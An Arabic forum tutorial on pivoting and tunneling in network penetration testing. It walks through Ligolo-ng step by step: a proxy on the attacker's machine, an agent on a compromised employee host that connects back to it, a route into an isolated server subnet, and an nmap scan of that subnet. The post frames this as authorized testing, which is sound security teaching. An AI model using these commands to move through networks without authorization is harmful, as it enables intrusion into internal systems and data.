Pivoting و Tunneling في اختبار اختراق الشبكات

x32x01
  • بواسطة x32x01 ||
🛡️ يعني إيه Pivoting و Tunneling في اختبار الاختراق؟
في اختبار اختراق الشبكات، أول ما توصل لجهاز واحد جوه شبكة الشركة، كده انت لسه في أول الطريق 😒🚂
المرحلة دي تعتبر أخطر مرحلة، لأن الأنظمة المهمة مش بتكون على نفس الشبكة، وغالبًا بتكون محبوسة جوه شبكات داخلية معزولة.

هنا بيظهر دور Pivoting و Tunneling، وهما اللي بيخلّوا اختبار الاختراق حقيقي وقريب جدًا من سيناريو هجوم واقعي 🔥



🔑 الفكرة ببساطة ومن غير تعقيد​

خلّيك فاكرها كده 👇
  • Pivoting 🧭
    يعني تستخدم الجهاز اللي اخترقته كنقطة عبور توصلك لشبكات أو أنظمة تانية مش باينالك من بره.
  • Tunneling 🚇
    يعني تعمل قناة اتصال تعدي من الجهاز ده، وتخليك تتعامل مع الشبكة الداخلية كأنك قاعد جواها.

تشبيه سريع:​

  • Pivoting = تختار الطريق جوه مدينة مقفولة
  • Tunneling = النفق اللي بيعديك في الطريق ده



⏰ إمتى نحتاج Pivoting فعلًا؟​

السيناريو ده بيحصل كتير جدًا لما:
  • الشبكة تكون متقسمة (Users / Servers / DMZ)
  • في Firewall أو ACL مانعين الوصول المباشر
  • الخدمات الحساسة تكون داخلية بس زي:
    • لوحات تحكم
    • أنظمة HR
    • File Servers
    • Databases
وهنا المختبر لو وقف عند أول جهاز، يبقى كده شغله ناقص ❌



🏢 مثال عملي على شبكة شركة​

خلّينا نفترض إن الشركة عندها:
  • شبكة الموظفين: 192.168.1.0/24
  • شبكة الخوادم: 10.0.0.0/24 (معزولة تمامًا عن الإنترنت)

الوضع الحالي:​

  • انت كمختبر خارجي ❌ مش شايف شبكة الخوادم
  • اخترقت جهاز موظف: 192.168.1.50
  • الجهاز ده يقدر يوصل لشبكة الخوادم من جوه
💡 الحل؟ طبعًا: Pivoting & Tunneling



⚙️ التطبيق العملي خطوة بخطوة باستخدام Ligolo-ng​

أداة Ligolo-ng من أقوى الأدوات في الـ Pivoting و Tunneling 💣

🟢 الخطوة 1: تجهيز الأداة​

على جهازك (المهاجم)
تحميل الأداة من GitHub (هتلاقيها بسهولة)

🟢 الخطوة 2: تشغيل الخادم​

على جهازك (المهاجم): sudo ./proxy -selfcert
📌 كده الخادم شغال ومستني اتصال على البورت 11601

🟢 الخطوة 3: تشغيل العميل على الجهاز المخترق​

على جهاز الموظف المخترق 192.168.1.50: ./agent -connect IP_جهازك:11601 -ignore-cert

🟢 الخطوة 4: تفعيل النفق​

بعد ما الاتصال يتم:
1️⃣ اختار الجلسة session 1
2️⃣ ابدأ النفق start

🟢 الخطوة 5: إضافة مسار شبكة الخوادم​

على جهازك (المهاجم): sudo ip route add 10.0.0.0/24 dev ligolo



✅ النتيجة النهائية​

دلوقتي انت تقدر 💪:
  • توصل لشبكة 10.0.0.0/24 مباشرة
  • تعمل Scan: nmap 10.0.0.0/24
  • تدخل على أي خدمة جوه الشبكة كأنك واحد من الموظفين 👀



🔥 ليه Pivoting و Tunneling مهمين جدًا؟​

Pivoting & Tunneling مش رفاهية ولا تقنيات متقدمة وخلاص، دول قلب اختبار اختراق الشبكات الحقيقي ❤️‍🔥
أول ما تثبت إن: جهاز واحد ممكن يبقى بوابة لباقي الشبكة
ساعتها الاختبار يتحوّل من شغل تقني إلى قيمة أمنية حقيقية تساعد الشركة تقفل الثغرات قبل ما هاكر حقيقي يستغلها 🚨
 
المواضيع ذات الصلة
x32x01
الردود
1
المشاهدات
977
x32x01
x32x01
x32x01
الردود
0
المشاهدات
106
x32x01
x32x01
x32x01
الردود
0
المشاهدات
818
x32x01
x32x01
x32x01
الردود
0
المشاهدات
995
x32x01
x32x01
x32x01
الردود
0
المشاهدات
549
x32x01
x32x01
الوسوم : الوسوم
cyber security dmz firewall ligolo ng nmap pivoting tunneling اختبار الاختراق الشبكات الداخلية امن الشبكات
الدخول أو التسجيل السريع
نسيت كلمة مرورك؟
إحصائيات المنتدى
المواضيع
2,356
المشاركات
2,569
أعضاء أكتب كود
569
أخر عضو
bahik
عودة
أعلى